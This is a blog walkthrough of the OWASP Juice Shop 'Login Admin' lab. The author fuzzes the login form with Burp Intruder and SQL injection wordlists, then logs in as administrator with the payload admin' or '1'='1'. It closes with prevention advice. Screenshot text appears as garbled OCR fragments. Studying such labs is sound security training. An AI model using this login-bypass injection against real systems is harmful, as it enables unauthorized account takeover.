Hacking OWASP’s Juice Shop Pt. 5: Login Admin

I’ve been writing up some fairly boring challenges for the sake of getting them out of the way, but now it’s finally time to actually hack!

Challenge:

Name: Login Admin

Description: Log in with the administrator’s user account

Difficulty: 2 star

Category: Injection

Expanded Description: https://pwning.owasp-juice.shop/part2/injection.html

Tools used:

Burp Suite, FoxyProxy

Resources used:

OWASP’s Testing for SQL Injection

SQL Injection cheat sheet for login bypass

Methodology:

Judging by the category of this challenge, I think it’s safe to assume that this is going to be an SQL injection challenge. To me, that means it’s time to fire up Burp Suite and figure out what data is being sent to the server.

Referer:
http://IOcalhost 3000/
Cookie. language=en; welcomebanner status=dismiss;
email
'admin@test . com' ,
password
'sql_inj ection_location'
cookieconsent
status=dismiss,
cont

Because Juice Shop is intentionally insecure, it’s safe to assume that the login email address will be fairly simple and guessable. The password, on the other hand, maybe not so much. That leaves us with two fields to tinker with, “user” and “password”.

One of the Burp features I’m kind of clumsy with, and could use more practice on, is called Intruder. It’s used for spamming login pages and the like with wordlists to find what words work in different fields. In this case I’m using the “Cluster Bomb” attack type. After sending off a dummy login request to see how the data is formatted, I sent that packet to Intruder and formatted the tool to focus on the two fields I wanted to probe.

Dashboard
Target
Proxy
ntrude
Options
Repeater
Sequencer
Decoder
Comparer
Extender
Project options
o itions Payloads
Target
O Payload Positions
Configure the positions where payloads will be inserted into the base request The attacktype determines the way in which 1
Attack type -Cluster bomb
1 POST /rest/user/login HTTP/I.I
Host: local host 3000
User-Agent: MoziIIa/S.O (X
11; Linux x86 64;
application/ j son, text/ plain,
4 Accept
S Accept -Language: en-LlS,
Accept -Encoding: gzip, deflate
7 Content -Type: application/ j son
Content -Length:
Origin: http•
// I Ocal host 3000
10 Connection: close
Referer: http://localhost : 3000/
rv.78.o)
Gecko,'20100101 Firefox,'78.o
12 Cookle: language=en; welcomebanner status=dismiss;
cookieconsent status=dismiss,
continueCode=
ZnbkE9%SVeQXj NqgrxKLpJvGmMTNin7UDvG3wDnSP4Rzy1ZY16am78200kz; 10=dZ8Jg2Ypz6-HY1rsAAA8
141{" email
'5adminS@j uice-sh.op ,
password
'Ssql_inj ect ion_l_ ocationS"} — _{Remember to clear all fields before selecting and adding the ones you want.}

Next I needed a wordlist of SQL Injection test strings to feed into the fields. Different databases have different weaknesses, so I wanted to be as thorough as possible. Back to Google I went, ultimately finding a cheat sheet listing dozens of possible queries. I loaded them into the password payload set, filled in a few generic administrator-type names into the user field payload set, and pressed “Start Attack”.

41-12 W W 0
工 45u2 凵 4n02E 一ト
」 0 」」山
い u04d0 い p 0 - 、 ed い LIO い Od
国 P20 - 、 ed
」 042 」 4 い一 u 一 W p 2
」 042 」 4 い一 u 一 W p 2
」 042 」 4 い一 u 一 W p 2
い 2 セ =
Ipeo - 、 ed anba
帑 5 」ト - の
u 一 u 」 p 2
u 一 u 」 p 2
u 一 u 」 p 2
25u 一 0 工 S L24- 『
400 」
400 」
400 」 — _{No luck.}

184 requests later I began to suspect that the password field might not contain any vulnerabilities, so I decided to try the user field. Considering that users are stored in a database, that bypassing authentication would likely return the first user in that database, and that the first user on any system is usually an administrator, it made some sense. Because this attack would nullify anything in the password field, I changed the attack type to “Sniper” (one field only), loaded the list of injection queries into the payload, and started a new attack.

Intruder attack4
Attack Save Columns
esults Target
Positions
Filter: Showing all items
Payload
or
or #
admin'
admin' #
admin'
or
admin' or
admin'
admin'
or
admin'or or'
admin'
or
35 Of 46
Payloads
Options
Status
401
Error
o
o
o
o
o
o
o
o
o
Timeout
o
o
o
o
o
o
o
o
o
Length
1586
o
Comment
Contains
Contains a JWT
Contains a JL'T — _{We have tokens!}

Now that we’ve found the vulnerability, it’s time to exploit it!

Login
Email
admin' or '1'='1'
Password
Forgot your password?
Log in
Remember me — _{Fingers crossed that we get an admin account}

And to confirm that we are, indeed, logged into an administrator’s account…

Q
e Account Your Basket EN
e
admin@juice-sh.op
Orders & Payment
Privacy & Security
Logout — _Success!

And to check the scoreboard…

You successfully solved a challenge: Login Admin (Log in with the administrator's user account.)
x — _{I’m in.}

Prevention and mitigation strategies:

OWASP SQL Injection Prevention Cheat Sheet

Sanitize every input a user provides!
Create a dummy account with no privileges and organize your database’s User table to ensure that, if SQL injection makes it past your input sanitization, it is the default/first account in that table. Better they should access a null account than that of an administrator.

Lessons Learned and Things Worth Mentioning:

Burp Suite would very much like for you to buy the professional edition. They show this by heavily throttling the rate at which Intruder sends requests.
Cheat sheets are a real time saver. After finding this, I created an entirely new wordlist in my /usr/share/wordlists directory for this. If it’s handy here, it will likely be handy elsewhere.
Sanitizing user input in every single field which is sent to your server is vital to prevent not only SQL injection, but also cross-site scripting attacks.

Curiosity Kills Colby

Northwestern Misadventures

Hacking OWASP’s Juice Shop Pt. 5: Login Admin

Leave a Reply Cancel reply

Share this:

Like this:

Related

Leave a Reply Cancel reply